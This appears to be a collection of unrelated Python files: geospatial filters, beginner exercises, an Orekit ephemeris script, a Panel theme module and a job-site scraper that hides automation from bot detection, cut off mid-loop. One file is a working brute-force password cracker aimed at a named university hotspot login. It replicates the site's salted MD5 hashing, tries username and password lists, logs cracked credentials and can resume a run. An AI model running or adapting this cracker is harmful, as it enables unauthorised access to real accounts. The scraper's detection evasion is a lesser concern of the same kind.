return X, Y, Z, dx, dy, proj
def tiffwrite(ofile, X, Y, Z, dx, dy, proj, otype='float'):
"""
Writing raster to a tif-file
:param ofile: name of ofile
:param X: x-coord of raster (2D)
:param Y: y-coord of raster (2D)
:param Z: values (2D)
:param dx: grid-spacing x
:param dy: grid-spacing y
:param proj: projection (epsg number)
:param dtype: save as 'int' or 'float'
:return: written file to memory
"""
proj = int(proj)
N, M = Z.shape
driver = gdal.GetDriverByName("GTiff")
if otype == 'int':
datatype = gdal.GDT_Int32
if otype == 'float':
datatype = gdal.GDT_Float32
ds = driver.Create(ofile, M, N, 1, datatype)
src = osr.SpatialReference()
src.ImportFromEPSG(proj)
ulx = np.min(np.min(X)) - 0.5 * dx
uly = np.max(np.max(Y)) + 0.5 * dy
geotransform = [ulx, dx, 0, uly, 0, -dy]
ds.SetGeoTransform(geotransform)
ds.SetProjection(src.ExportToWkt())
ds.GetRasterBand(1).SetNoDataValue(np.nan)
ds.GetRasterBand(1).WriteArray(Z)
ds = None
def binning(x, y, xmin=None, xmax=None, dx=1 / 12.,
window=3 / 12., interp=False, median=False):
"""Time-series binning (w/overlapping windows).
Args:
x,y: time and value of time series.
xmin,xmax: time span of returned binned series.
dx: time step of binning.
window: size of binning window.
interp: interpolate binned values to original x points.
"""
if xmin is None:
xmin = np.nanmin(x)
if xmax is None:
xmax = np.nanmax(x)
steps = np.arange(xmin, xmax, dx) # time steps
bins = [(ti, ti + window) for ti in steps] # bin limits
N = len(bins)
yb = np.full(N, np.nan)
xb = np.full(N, np.nan)
eb = np.full(N, np.nan)
nb = np.full(N, np.nan)
sb = np.full(N, np.nan)
for i in range(N):
t1, t2 = bins[i]
idx, = np.where((x >= t1) & (x <= t2))
if len(idx) == 0:
xb[i] = 0.5 * (t1 + t2)
continue
ybv = y[idx]
if median:
yb[i] = np.nanmedian(ybv)
else:
yb[i] = np.nanmean(ybv)
xb[i] = 0.5 * (t1 + t2)
eb[i] = mad_std(ybv)
nb[i] = np.sum(~np.isnan(ybv))
sb[i] = np.sum(ybv)
if interp:
try:
yb = np.interp(x, xb, yb)
eb = np.interp(x, xb, eb)
sb = np.interp(x, xb, sb)
xb = x
except:
pass
return xb, yb, eb, nb, sb
def hampel_filter1d(x, k, t0=3):
"""
Hampel-filter for outlier editing
:param x: values
:param k: window size (int)
:param t0: sigma threshold value
:return: filtered array with nan's
"""
x = np.pad(x, k, 'constant', constant_values=9999)
x[x == 9999] = np.nan
n = len(x)
y = x.copy()
L = 1.4826
for i in range((k + 1),(n - k)):
if np.isnan(x[(i - k):(i + k+1)]).all():
continue
x0 = np.nanmedian(x[(i - k):(i + k+1)])
S0 = L * np.nanmedian(np.abs(x[(i - k):(i + k+1)] - x0))
if np.abs(x[i] - x0) > t0 * S0:
y[i] = np.nan
y = y[k:-k]
return y
def sgolay1d(h, window=3, order=1, deriv=0, dt=1.0, mode="nearest", time=None):
"""Savitztky-Golay filter with support for NaNs.
If time is given, interpolate NaNs otherwise pad w/zeros.
If time is given, calculate dt as t[1]-t[0].
Args:
dt (int): spacing between samples (for correct units).
Notes:
Works with numpy, pandas and xarray objects.
"""
if isinstance(h, (pd.Series, xr.DataArray)):
h = h.values
if isinstance(time, (pd.Series, xr.DataArray)):
time = time.values
_h = h.copy()
(i_nan,) = np.where(np.isnan(_h))
(i_valid,) = np.where(np.isfinite(_h))
if i_valid.size < 5:
return _h
elif time is not None:
_h[i_nan] = np.interp(time[i_nan], time[i_valid], _h[i_valid])
dt = np.abs(time[1] - time[0])
else:
_h[i_nan] = 0
return signal.savgol_filter(_h, window, order, deriv, delta=dt, mode=mode)
def sgolay2d(z, window_size, order, derivative=None):
"""Two dimensional data smoothing and least-square gradient estimate.
Code from:
http://scipy-cookbook.readthedocs.io/items/SavitzkyGolay.html
Reference:
A. Savitzky, M. J. E. Golay, Smoothing and Differentiation of
Data by Simplified Least Squares Procedures. Analytical
Chemistry, 1964, 36 (8), pp 1627-1639.
"""
# number of terms in the polynomial expression
# TODO: Double check this (changed for Py3)
n_terms = (order + 1) * (order + 2) // 2
if window_size % 2 == 0:
raise ValueError("window_size must be odd")
if window_size ** 2 < n_terms:
raise ValueError("order is too high for the window size")
half_size = window_size // 2
# exponents of the polynomial.
# p(x,y) = a0 + a1*x + a2*y + a3*x^2 + a4*y^2 + a5*x*y + ...
# this line gives a list of two item tuple. Each tuple contains
# the exponents of the k-th term. First element of tuple is for x
# second element for y.
# Ex. exps = [(0,0), (1,0), (0,1), (2,0), (1,1), (0,2), ...]
exps = [(k - n, n) for k in range(order + 1) for n in range(k + 1)]
# coordinates of points
ind = np.arange(-half_size, half_size + 1, dtype=np.float64)
dx = np.repeat(ind, window_size)
dy = np.tile(ind, [window_size, 1]).reshape(window_size ** 2,)
# build matrix of system of equation
A = np.empty((window_size ** 2, len(exps)))
for i, exp in enumerate(exps):
A[:, i] = (dx ** exp[0]) * (dy ** exp[1])
# pad input array with appropriate values at the four borders
new_shape = z.shape[0] + 2 * half_size, z.shape[1] + 2 * half_size
Z = np.zeros((new_shape))
# top band
band = z[0, :]
Z[:half_size, half_size:-half_size] = band - np.abs(
np.flipud(z[1 : half_size + 1, :]) - band
)
# bottom band
band = z[-1, :]
Z[-half_size:, half_size:-half_size] = band + np.abs(
np.flipud(z[-half_size - 1 : -1, :]) - band
)
# left band
band = np.tile(z[:, 0].reshape(-1, 1), [1, half_size])
Z[half_size:-half_size, :half_size] = band - np.abs(
np.fliplr(z[:, 1 : half_size + 1]) - band
)
# right band
band = np.tile(z[:, -1].reshape(-1, 1), [1, half_size])
Z[half_size:-half_size, -half_size:] = band + np.abs(
np.fliplr(z[:, -half_size - 1 : -1]) - band
)
# central band
Z[half_size:-half_size, half_size:-half_size] = z
# top left corner
band = z[0, 0]
Z[:half_size, :half_size] = band - np.abs(
np.flipud(np.fliplr(z[1 : half_size + 1, 1 : half_size + 1])) - band
)
# bottom right corner
band = z[-1, -1]
Z[-half_size:, -half_size:] = band + np.abs(
np.flipud(np.fliplr(z[-half_size - 1 : -1, -half_size - 1 : -1]))
- band
)
# top right corner
band = Z[half_size, -half_size:]
Z[:half_size, -half_size:] = band - np.abs(
np.flipud(Z[half_size + 1 : 2 * half_size + 1, -half_size:]) - band
)
# bottom left corner
band = Z[-half_size:, half_size].reshape(-1, 1)
Z[-half_size:, :half_size] = band - np.abs(
np.fliplr(Z[-half_size:, half_size + 1 : 2 * half_size + 1]) - band
)
# solve system and convolve
if derivative is None:
m = np.linalg.pinv(A)[0].reshape((window_size, -1))
return signal.fftconvolve(Z, m, mode="valid")
elif derivative == "col":
c = np.linalg.pinv(A)[1].reshape((window_size, -1))
return signal.fftconvolve(Z, -c, mode="valid")
elif derivative == "row":
r = np.linalg.pinv(A)[2].reshape((window_size, -1))
return signal.fftconvolve(Z, -r, mode="valid")
elif derivative == "both":
c = np.linalg.pinv(A)[1].reshape((window_size, -1))
r = np.linalg.pinv(A)[2].reshape((window_size, -1))
return (
signal.fftconvolve(Z, -r, mode="valid"),
signal.fftconvolve(Z, -c, mode="valid"),
)
# Some edge test cases (for the 3-km grid)
test_ij_3km = [
(845, 365), # 0 PIG Floating 1
(831, 364), # 1 PIG Floating 2
(1022, 840), # 2 CS-2 only 1
(970, 880), # 3 CS-2 only 2
(100, 1170), # 4 fig1 large peaks at mission overlaps
(100, 766), # 5 fig2 peak at mission overlap
(7, 893), # 6 step change at beguining
(8, 892), # 7 with hole
(9, 889), # 8 with large hole
(11, 893), # 9 step in divergence
] |
admin_message = "Let me know how you are doing!"
admin_message += "\nHow are you doing? "
hayd = input(admin_message)
print(f"You are doing {hayd}")
car_message = input("Enter the car you're looking for: ")
print(f"Let's see if we can find a {car_message} for you.")
seating = input("How many people are you seating? ")
seatings = int(seating)
if seatings > 8:
print("Sorry! You'll have to wait for a table.")
else:
print("Come on in m8. We got you a table.")
num_0 = input("Enter a number: ")
numeral = int(num_0)
if numeral % 10 == 0:
print("It is a multiple of 10")
else:
print("Nope.")
|
import argparse
import hashlib
import os
from bs4 import BeautifulSoup as bs
import requests
from time import ctime, time
address = "http://hotspot.abu.edu.ng/login"
def main():
try:
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--usernames", help="specify a file containing list of usernames", required=True)
parser.add_argument("-p", "--passwords", help="specify a file containing list of passwords", required=True)
args = parser.parse_args()
opener(args.usernames, args.passwords)
except KeyboardInterrupt as e:
print("Cracking interrupted....Ending...")
exit()
#opener: u gussed it as the name implies open a list of usernames and passwords
#read them and save them to memory
def opener(user_list, pass_list):
try:
with open(os.getcwd()+"/"+user_list, "r") as f:
usernames = f.readlines() # contains the list of usernames
with open(os.getcwd()+"/"+pass_list, "r") as f:
passwords = f.readlines() #contains the list of passwords
first_unresumed = passwords[0]
print("Loaded "+str(len(usernames))+" usernames with "+str(len(passwords))+" passwords...")
passwords = try_resume(passwords)
first_resumed = passwords[0]
if first_resumed != first_unresumed:
print("Resume point found...resuming from "+first_resumed+"\npasswords remaining: "+str(len(passwords)))
cracker(usernames, passwords)
except IOError as e:
print(e)
exit()
#this function try all the combination of usernames and password in the
#supplied dictionaries(of usernames and passwords)
def cracker(usernames, passwords):
try:
with open(os.getcwd()+"/cracked_cred.dmd", "a") as f:
start_time = time()
print("Started at %s \nCracking..."%ctime(start_time))
for psswds in passwords:
psswd = psswds.strip("\n")
for users in usernames:
user = users.strip("\n")
psswd = encrypt(psswd) #placed here in case of more than 1 username
print("trying user: "+user+" with hash "+psswd)
cracked = checker(user, psswd)
if cracked == True:
f.write(user+"::"+psswds+"\n")
print("found password for "+user+" ==> "+psswds)
usernames.remove(users)
elif cracked == "somethin":
print("somthing abnormal happened...with user: "+user+" with password: "+psswds)
raise KeyboardInterrupt
print("Exhausted the list of passwords \n total time taken: %s"%time()-start_time)
except KeyboardInterrupt:
with open(os.getcwd()+"/resume.dmd", "w") as f:
f.write(psswds)
exit()
except Exception as e:
print(e)
exit()
#this function checks if the username and password matches by passing
#them to the site
def checker(user, psswd):
try:
payloads = {"username":user, "password":psswd, "dst":"", "popup":"true"}
with requests.Session() as s:
page = s.post(address, data=payloads)
soup = bs(page.content, "html.parser")
page = soup.prettify("utf-8")
if "You are logged in" in page:
with requests.Session() as s:
s.get("http://hotspot.abu.edu.ng/logout")
return True
elif "ANNOUNCEMENT" not in page:
return "somethin"
except Exception as e:
print(e)
exit()
#this function replicates the security implementation used in the site
#which is happening on client side
#i.e appending a salt to begining and end of password then encrypting
#with md5
def encrypt(psswd):
try:
with requests.Session() as s:
page = s.get(address) #get the login page
soup = bs(page.content, "html.parser") #parsing the page
clean_page = soup.prettify("utf-8")
clean_page_soup = bs(clean_page, "html.parser")
script = str(clean_page_soup.find("script").find_next().string.strip())
first = chr(int(script[144:147], 8))
second = script[185:248].split("\\")
chars = [] #this will contains a list of character that will be converted to 4rm ints in the next lines
for i in second: #for each item in the list second
chars.append(chr(int(i, 8))) #append a chr value which is converted from int
second = "".join(chars)
return hashlib.md5(first+psswd+second).hexdigest()
except Exception as e:
print(e)
exit()
def try_resume(passwords):
if not os.path.exists(os.getcwd()+"/resume.dmd"):
file_open = open(os.getcwd()+"/resume.dmd", "w")
file_open.close()
return passwords
with open("resume.dmd", "r") as f:
last_pass = f.readline()
if last_pass.strip("\n") == "":
return passwords
else:
pass_index = passwords.index(last_pass)
passwords = passwords[pass_index:]
return passwords
if __name__=="__main__":
main()
|
import os
def _stop_and_close(qtbot, v):
if os.environ.get('PHY_TEST_STOP', None): # pragma: no cover
qtbot.stop()
v.close()
|
import orekit
orekit.initVM()
# Modified from https://gitlab.orekit.org/orekit-labs/python-wrapper/blob/master/python_files/pyhelpers.py
from java.io import File
from org.orekit.data import DataProvidersManager, DirectoryCrawler
from orekit import JArray
orekit_data_dir = 'orekit-data'
DM = DataProvidersManager.getInstance()
datafile = File(orekit_data_dir)
if not datafile.exists():
print('Directory :', datafile.absolutePath, ' not found')
crawler = DirectoryCrawler(datafile)
DM.clearProviders()
DM.addProvider(crawler)
from org.orekit.frames import FramesFactory
icrf = FramesFactory.getICRF()
eme2000 = FramesFactory.getEME2000()
from org.orekit.time import TimeScalesFactory
tai = TimeScalesFactory.getTAI()
utc = TimeScalesFactory.getUTC()
from org.orekit.time import AbsoluteDate
mjd_epoch_tai = AbsoluteDate(1858, 11, 17, 0, 0, 0.0, tai)
planets = [
'Mercury',
'Venus',
'Earth',
'Moon',
'Mars',
'Jupiter',
'Saturn',
'Uranus',
'Neptune'
]
originator = 'GorgiAstro'
from odmadmpy.core import Oem, Aem
oem = Oem(originator, standard='CIC')
aem = Aem(originator, standard='CIC')
comment = 'Generated from Orekit using DE405 ephemerides'
cic_output_folder = 'CIC-data'
meta_mandat_oem_cic_sample = {
'OBJECT_NAME': 'MARS',
'OBJECT_ID': 'MARS',
'CENTER_NAME': 'SUN',
'REF_FRAME': 'ICRF',
'TIME_SYSTEM': 'TAI'
}
meta_mandat_oem_cic_moon = {
'OBJECT_NAME': 'MOON',
'OBJECT_ID': 'MOON',
'CENTER_NAME': 'EARTH',
'REF_FRAME': 'EME2000',
'TIME_SYSTEM': 'TAI'
}
meta_mandat_aem_cic_sample = {
'OBJECT_NAME': 'MARS',
'OBJECT_ID': 'MARS',
'REF_FRAME_A': 'ICRF',
'REF_FRAME_B': 'BODY',
'ATTITUDE_DIR': 'A2B',
'TIME_SYSTEM': 'TAI',
'ATTITUDE_TYPE': 'QUATERNION'
}
meta_opt_aem_cic = {
'QUATERNION_TYPE': 'FIRST'
}
meta_mandat_aem_cic_moon = {
'OBJECT_NAME': 'MOON',
'OBJECT_ID': 'MOON',
'REF_FRAME_A': 'EME2000',
'REF_FRAME_B': 'BODY',
'ATTITUDE_DIR': 'A2B',
'TIME_SYSTEM': 'TAI',
'ATTITUDE_TYPE': 'QUATERNION'
}
from org.orekit.bodies import CelestialBodyFactory
from org.orekit.utils import PVCoordinatesProvider
from orekit.pyhelpers import datetime_to_absolutedate, absolutedate_to_datetime
import pandas as pd
import numpy as np
import os
from tqdm import tqdm
date_init = AbsoluteDate(1957, 1, 1, tai)
date_end = AbsoluteDate(2057, 1, 1, tai)
dt = 86400.0 / 5
for planet_name in planets:
print(f'Started generating ephemerides for {planet_name}')
if planet_name == 'Moon':
meta_mandat_oem_cic = meta_mandat_oem_cic_moon
meta_mandat_aem_cic = meta_mandat_aem_cic_moon
ref_frame = eme2000
else:
meta_mandat_oem_cic = meta_mandat_oem_cic_sample
meta_mandat_aem_cic = meta_mandat_aem_cic_sample
meta_mandat_oem_cic['OBJECT_NAME'] = planet_name.upper()
meta_mandat_oem_cic['OBJECT_ID'] = planet_name.upper()
meta_mandat_aem_cic['OBJECT_NAME'] = planet_name.upper()
meta_mandat_aem_cic['OBJECT_ID'] = planet_name.upper()
ref_frame = icrf
df = pd.DataFrame(columns=['MJD', 'x', 'y', 'z', 'vx', 'vy', 'vz', 'qs', 'qx', 'qy', 'qz'])
cbody = CelestialBodyFactory.getBody(planet_name.upper())
cbody_pv_provider = PVCoordinatesProvider.cast_(cbody)
cbody_frame = cbody.getBodyOrientedFrame()
date_current = date_init
years_from_start = 0.0
years_from_start_previous = 0.0
with tqdm(total=100) as pbar:
while date_current.compareTo(date_end) < 0:
pv = cbody_pv_provider.getPVCoordinates(date_current, ref_frame)
ref_frame_to_body = ref_frame.getTransformTo(cbody_frame, date_current)
rot = ref_frame_to_body.getRotation()
quat = [rot.getQ0(), rot.getQ1(), rot.getQ2(), rot.getQ3()]
mjd = date_current.offsetFrom(mjd_epoch_tai, tai) / 86400
df.loc[absolutedate_to_datetime(date_current)] = np.concatenate((
[mjd],
np.array(pv.getPosition().toArray()),
np.array(pv.getVelocity().toArray()),
quat))
date_current = date_current.shiftedBy(dt)
date_comp = date_current.getComponents(tai)
is_new_year = (date_comp.getDate().getDayOfYear() == 1) and (date_comp.getTime().getSecondsInLocalDay() < dt / 2)
if is_new_year:
pbar.update(1)
df['datetime'] = df.index
oem_segments = []
oem_segments += oem.format_segment(df, meta_mandat_oem_cic)
oem.write_file(oem_segments, os.path.join(cic_output_folder, f'{planet_name}_OEM_EME2000.txt'), comments=[comment])
aem_segments = []
aem_segments += aem.format_segment(df, meta_mandat_aem_cic, meta_opt_aem_cic)
aem.write_file(aem_segments, os.path.join(cic_output_folder, f'{planet_name}_AEM_EME2000.txt'), comments=[comment])
print(f'Finished generating ephemerides for {planet_name}')
|
Autocube Numbers
Autocube numbers are numbers having "n" digits such that the last n digits of the cube of the number will be the number itself. Write an algorithm and the subsequent Python code to check if the given number is autocube. Write a function to find the cube of a given number.. For example, 25 is a 2 digit autocube number with a cube of 15625 and 376 with its cube 53157376, is a 3 digit autocube number.
Input Format: First line contains the number to be checked
Output Format: Print Autocube or Not autocube
def cube(n):
return(n*n*n)
n=int(input())
c=cube(n)
s=0
m=len(str(n))
L=len(str(n))
for i in range(L):
s+=(c%10)*(10)**i
m-=1
c//=10
if(s==n):
print('Autocube')
else:
print('Not autocube')
|
from __future__ import annotations
import functools
import os
import pathlib
from typing import (
TYPE_CHECKING, Any, ClassVar, Dict, List, Literal, Tuple, Type,
)
import param
from bokeh.models import ImportedStyleSheet
from bokeh.themes import Theme as _BkTheme, _dark_minimal, built_in_themes
from ..config import config
from ..io.resources import (
ResourceComponent, component_resource_path, get_dist_path,
resolve_custom_path,
)
from ..util import relative_to
if TYPE_CHECKING:
from bokeh.document import Document
from bokeh.model import Model
from ..io.resources import ResourceTypes
from ..viewable import Viewable
class Inherit:
"""
Singleton object to declare stylesheet inheritance.
"""
class Theme(param.Parameterized):
"""
Theme objects declare the styles to switch between different color
modes. Each `Design` may declare any number of color themes.
`modifiers`
The modifiers override parameter values of Panel components.
"""
base_css = param.Filename(doc="""
A stylesheet declaring the base variables that define the color
scheme. By default this is inherited from a base class.""")
bokeh_theme = param.ClassSelector(class_=(_BkTheme, str), default=None, doc="""
A Bokeh Theme class that declares properties to apply to Bokeh
models. This is necessary to ensure that plots and other canvas
based components are styled appropriately.""")
css = param.Filename(doc="""
A stylesheet that overrides variables specifically for the
Theme subclass. In most cases, this is not necessary.""")
modifiers: ClassVar[Dict[Viewable, Dict[str, Any]]] = {}
BOKEH_DARK = dict(_dark_minimal.json)
BOKEH_DARK['attrs']['Plot'].update({
"background_fill_color": "#2b3035",
"border_fill_color": "#212529",
})
THEME_CSS = pathlib.Path(__file__).parent / 'css'
class DefaultTheme(Theme):
"""
Baseclass for default or light themes.
"""
base_css = param.Filename(default=THEME_CSS / 'default.css')
_name: ClassVar[str] = 'default'
class DarkTheme(Theme):
"""
Baseclass for dark themes.
"""
base_css = param.Filename(default=THEME_CSS / 'dark.css')
bokeh_theme = param.ClassSelector(class_=(_BkTheme, str),
default=_BkTheme(json=BOKEH_DARK))
_name: ClassVar[str] = 'dark'
class Design(param.Parameterized, ResourceComponent):
theme = param.ClassSelector(class_=Theme, constant=True)
# Defines parameter overrides to apply to each model
modifiers: ClassVar[Dict[Viewable, Dict[str, Any]]] = {}
# Defines the resources required to render this theme
_resources: ClassVar[Dict[str, Dict[str, str]]] = {}
# Declares valid themes for this Design
_themes: ClassVar[Dict[str, Type[Theme]]] = {
'default': DefaultTheme,
'dark': DarkTheme
}
def __init__(self, theme=None, **params):
if isinstance(theme, type) and issubclass(theme, Theme):
theme = theme._name
elif theme is None:
theme = 'default'
theme = self._themes[theme]()
super().__init__(theme=theme, **params)
def _reapply(
self, viewable: Viewable, root: Model, old_models: List[Model] = None,
isolated: bool=True, cache=None, document=None
) -> None:
ref = root.ref['id']
for o in viewable.select():
if o.design and not isolated:
continue
elif not o.design and not isolated:
o._design = self
if old_models and ref in o._models:
if o._models[ref][0] in old_models:
continue
self._apply_modifiers(o, ref, self.theme, isolated, cache, document)
def _apply_hooks(self, viewable: Viewable, root: Model, changed: Viewable, old_models=None) -> None:
from ..io.state import state
if root.document in state._stylesheets:
cache = state._stylesheets[root.document]
else:
state._stylesheets[root.document] = cache = {}
with root.document.models.freeze():
self._reapply(changed, root, old_models, isolated=False, cache=cache, document=root.document)
def _wrapper(self, viewable):
return viewable
@classmethod
def _resolve_stylesheets(cls, value, defining_cls, inherited):
from ..io.resources import resolve_stylesheet
stylesheets = []
for stylesheet in value:
if stylesheet is Inherit:
stylesheets.extend(inherited)
continue
resolved = resolve_stylesheet(defining_cls, stylesheet, 'modifiers')
stylesheets.append(resolved)
return stylesheets
@classmethod
@functools.lru_cache
def _resolve_modifiers(cls, vtype, theme):
"""
Iterate over the class hierarchy in reverse order and accumulate
all modifiers that apply to the objects class and its super classes.
"""
modifiers, child_modifiers = {}, {}
for scls in vtype.__mro__[::-1]:
cls_modifiers = cls.modifiers.get(scls, {})
modifiers.update(theme.modifiers.get(scls, {}))
for super_cls in cls.__mro__[::-1]:
cls_modifiers = getattr(super_cls, 'modifiers', {}).get(scls, {})
for prop, value in cls_modifiers.items():
if prop == 'children':
continue
elif prop == 'stylesheets':
modifiers[prop] = cls._resolve_stylesheets(value, super_cls, modifiers.get(prop, []))
else:
modifiers[prop] = value
child_modifiers.update(cls_modifiers.get('children', {}))
return modifiers, child_modifiers
@classmethod
def _get_modifiers(
cls, viewable: Viewable, theme: Theme = None, isolated: bool = True
):
from ..io.resources import (
CDN_DIST, component_resource_path, resolve_custom_path,
)
modifiers, child_modifiers = cls._resolve_modifiers(type(viewable), theme)
modifiers = dict(modifiers)
if 'stylesheets' in modifiers:
if isolated:
pre = list(cls._resources.get('css', {}).values())
for p in ('base_css', 'css'):
css = getattr(theme, p)
if css is None:
continue
css = pathlib.Path(css)
if relative_to(css, THEME_CSS):
pre.append(f'{CDN_DIST}bundled/theme/{css.name}')
elif resolve_custom_path(theme, css):
pre.append(component_resource_path(theme, p, css))
else:
pre.append(css.read_text(encoding='utf-8'))
else:
pre = []
modifiers['stylesheets'] = pre + modifiers['stylesheets']
return modifiers, child_modifiers
@classmethod
def _patch_modifiers(cls, doc, modifiers, cache):
if 'stylesheets' in modifiers:
stylesheets = []
for sts in modifiers['stylesheets']:
if sts.endswith('.css'):
if cache and sts in cache:
sts = cache[sts]
else:
sts = ImportedStyleSheet(url=sts)
if cache is not None:
cache[sts.url] = sts
stylesheets.append(sts)
modifiers['stylesheets'] = stylesheets
@classmethod
def _apply_modifiers(
cls, viewable: Viewable, mref: str, theme: Theme, isolated: bool,
cache={}, document=None
) -> None:
if mref not in viewable._models:
return
model, _ = viewable._models[mref]
modifiers, child_modifiers = cls._get_modifiers(viewable, theme, isolated)
cls._patch_modifiers(model.document or document, modifiers, cache)
if child_modifiers:
for child in viewable:
cls._apply_params(child, mref, child_modifiers, document)
if modifiers:
cls._apply_params(viewable, mref, modifiers, document)
@classmethod
def _apply_params(cls, viewable, mref, modifiers, document=None):
# Apply params never sync the modifier values with the Viewable
# This should not be a concern since most `Layoutable` properties,
# e.g. stylesheets or sizing_mode, are not synced between the
# Panel component and the model anyway however in certain edge cases
# this may end up causing issues.
from ..io.resources import CDN_DIST, patch_stylesheet
model, _ = viewable._models[mref]
params = {
k: v for k, v in modifiers.items() if k != 'children' and
getattr(viewable, k) == viewable.param[k].default
}
if 'stylesheets' in modifiers:
params['stylesheets'] = modifiers['stylesheets'] + viewable.stylesheets
props = viewable._process_param_change(params)
doc = model.document or document
if doc and 'dist_url' in doc._template_variables:
dist_url = doc._template_variables['dist_url']
else:
dist_url = CDN_DIST
for stylesheet in props.get('stylesheets', []):
if isinstance(stylesheet, ImportedStyleSheet):
patch_stylesheet(stylesheet, dist_url)
# Do not update stylesheets if they match
if 'stylesheets' in props and len(model.stylesheets) == len(props['stylesheets']):
all_match = True
stylesheets = []
for st1, st2 in zip(model.stylesheets, props['stylesheets']):
if st1 == st2:
stylesheets.append(st1)
continue
elif type(st1) is type(st2) and isinstance(st1, ImportedStyleSheet) and st1.url == st2.url:
stylesheets.append(st1)
continue
stylesheets.append(st2)
all_match = False
if all_match:
del props['stylesheets']
else:
props['stylesheets'] = stylesheets
model.update(**props)
if hasattr(viewable, '_synced_properties') and 'objects' in viewable._property_mapping:
obj_key = viewable._property_mapping['objects']
child_props = {
p: v for p, v in params.items() if p in viewable._synced_properties
}
for child in getattr(model, obj_key):
child.update(**child_props)
#----------------------------------------------------------------
# Public API
#----------------------------------------------------------------
def apply(self, viewable: Viewable, root: Model, isolated: bool=True):
"""
Applies the Design to a Viewable and all it children.
Arguments
---------
viewable: Viewable
The Viewable to apply the Design to.
root: Model
The root Bokeh model to apply the Design to.
isolated: bool
Whether the Design is applied to an individual component
or embedded in a template that ensures the resources,
such as CSS variable definitions and JS are already
initialized.
"""
doc = root.document
if not doc:
self._reapply(viewable, root, isolated=isolated)
return
from ..io.state import state
if doc in state._stylesheets:
cache = state._stylesheets[doc]
else:
state._stylesheets[doc] = cache = {}
with doc.models.freeze():
self._reapply(viewable, root, isolated=isolated, cache=cache)
if self.theme and self.theme.bokeh_theme and doc:
doc.theme = self.theme.bokeh_theme
def apply_bokeh_theme_to_model(self, model: Model, theme_override=None):
"""
Applies the Bokeh theme associated with this Design system
to a model.
Arguments
---------
model: bokeh.model.Model
The Model to apply the theme on.
theme_override: str | None
A different theme to apply.
"""
theme = theme_override or self.theme.bokeh_theme
if isinstance(theme, str):
theme = built_in_themes.get(theme)
if not theme:
return
for sm in model.references():
theme.apply_to_model(sm)
def resolve_resources(
self, cdn: bool | Literal['auto'] = 'auto', include_theme: bool = True
) -> ResourceTypes:
"""
Resolves the resources required for this design component.
Arguments
---------
cdn: bool | Literal['auto']
Whether to load resources from CDN or local server. If set
to 'auto' value will be automatically determine based on
global settings.
include_theme: bool
Whether to include theme resources.
Returns
-------
Dictionary containing JS and CSS resources.
"""
resource_types = super().resolve_resources(cdn)
if not include_theme:
return resource_types
dist_path = get_dist_path(cdn=cdn)
css_files = resource_types['css']
theme = self.theme
for attr in ('base_css', 'css'):
css = getattr(theme, attr, None)
if css is None:
continue
basename = os.path.basename(css)
key = 'theme_base' if 'base' in attr else 'theme'
if relative_to(css, THEME_CSS):
css_files[key] = dist_path + f'bundled/theme/{basename}'
elif resolve_custom_path(theme, css):
owner = type(theme).param[attr].owner
css_files[key] = component_resource_path(owner, attr, css)
return resource_types
def params(
self, viewable: Viewable, doc: Document | None = None
) -> Tuple[Dict[str, Any], Dict[str, Any]]:
"""
Provides parameter values to apply the provided Viewable.
Arguments
---------
viewable: Viewable
The Viewable to return modifiers for.
doc: Document | None
Document the Viewable will be rendered into. Useful
for caching any stylesheets that are created.
Returns
-------
modifiers: Dict[str, Any]
Dictionary of parameter values to apply to the Viewable.
child_modifiers: Dict[str, Any]
Dictionary of parameter values to apply to the children
of the Viewable.
"""
from ..io.state import state
if doc is None:
cache = {}
elif doc in state._stylesheets:
cache = state._stylesheets[doc]
else:
state._stylesheets[doc] = cache = {}
modifiers, child_modifiers = self._get_modifiers(viewable, theme=self.theme)
self._patch_modifiers(doc, modifiers, cache)
return modifiers, child_modifiers
config.param.design.class_ = Design
THEMES = {
'default': DefaultTheme,
'dark': DarkTheme
}
|
import argparse
class CLA:
"""Command line arguments class"""
def __init__(self):
self.parser = argparse.ArgumentParser(description="Some description!")
self.parser.add_argument(
"-i", action="store", dest="input_file", type=str, required=True
)
self.parser.add_argument(
"-o", action="store", dest="output_file", type=str, required=True
)
self.parser.add_argument("-c", action="store_true", dest="color_bool")
self.args = self.parser.parse_args()
if __name__ == "__main__":
"""debug and testing"""
cla = CLA()
print(cla.args)
print(cla.args.input_file)
print(cla.args.output_file)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: hao 2019/11/21-20:00
from datetime import datetime
from pymongo import MongoClient
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
class BossJob:
def __init__(self):
# 声明浏览器配置, 这种配置能让js检测不出来,我们是webdriver
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-automation'])
# 声明第一个浏览器, 传入配置, 用作获取职位链接
self.chrome = webdriver.Chrome(r'E:\chromedriver.exe', options=options)
# 声明第二个浏览器, 用作访问职位详情页
self.chrome2 = webdriver.Chrome(r'E:\chromedriver.exe', options=options)
# 声明数据库
self.coll = MongoClient(host="localhost", port=27017).Spider.BossJobs
# 设置过期时间
self.coll.create_index([('WriteTime', 1)], expireAfterSeconds=259200)
def write_item(self, item):
item['WriteTime'] = datetime.utcnow()
self.coll.insert_one(item)
print(f'>>>[{item["Name"]}]写入成功')
def job_detail(self, url):
# 打开工作详情页到一个新窗口
if self.coll.find_one({'URL': url}):
print('已爬取,跳过: ', url)
return
# 获取详情页的数据
self.chrome2.get(url)
item = {}
item['URL'] = self.chrome2.current_url # 链接
item['Name'] = self.chrome2.find_element_by_tag_name('h1').text # 职位职称
item['Salary'] = self.chrome2.find_element_by_class_name('salary').text # 薪资
item['Info'] = self.chrome2.find_element_by_xpath('//div[@class="job-banner"]//p').text # 城市,工作经验,学历
tags_ls = self.chrome2.find_elements_by_xpath('//div[@class="info-primary"]//div[@class="job-tags"]/span')
item['Tags'] = [tag.text for tag in tags_ls] # 工作标签
item['Description'] = self.chrome2.find_element_by_xpath(
'//div[@class="job-sec"]/div[@class="text"]').text # 职位描述
item['Company'] = self.chrome2.find_element_by_xpath('//div[@class="company-info"]/a[1]').get_attribute(
'title').split()[0] # 公司名称
item['UpdateTime'] = self.chrome2.find_elements_by_class_name('gray')[0].text[4:] # 更新时间
self.write_item(item)
def run(self, job):
"""运行方法, 获取所有工作的url"""
self.chrome.get('https://www.zhipin.com')
# 输入关键字到搜索框
self.chrome.find_element_by_name("query").send_keys(job)
# 按下回车以搜索
ActionChains(self.chrome).key_down(Keys.ENTER).key_up(Keys.ENTER).perform()
while 1:
# 抓取所有的职位
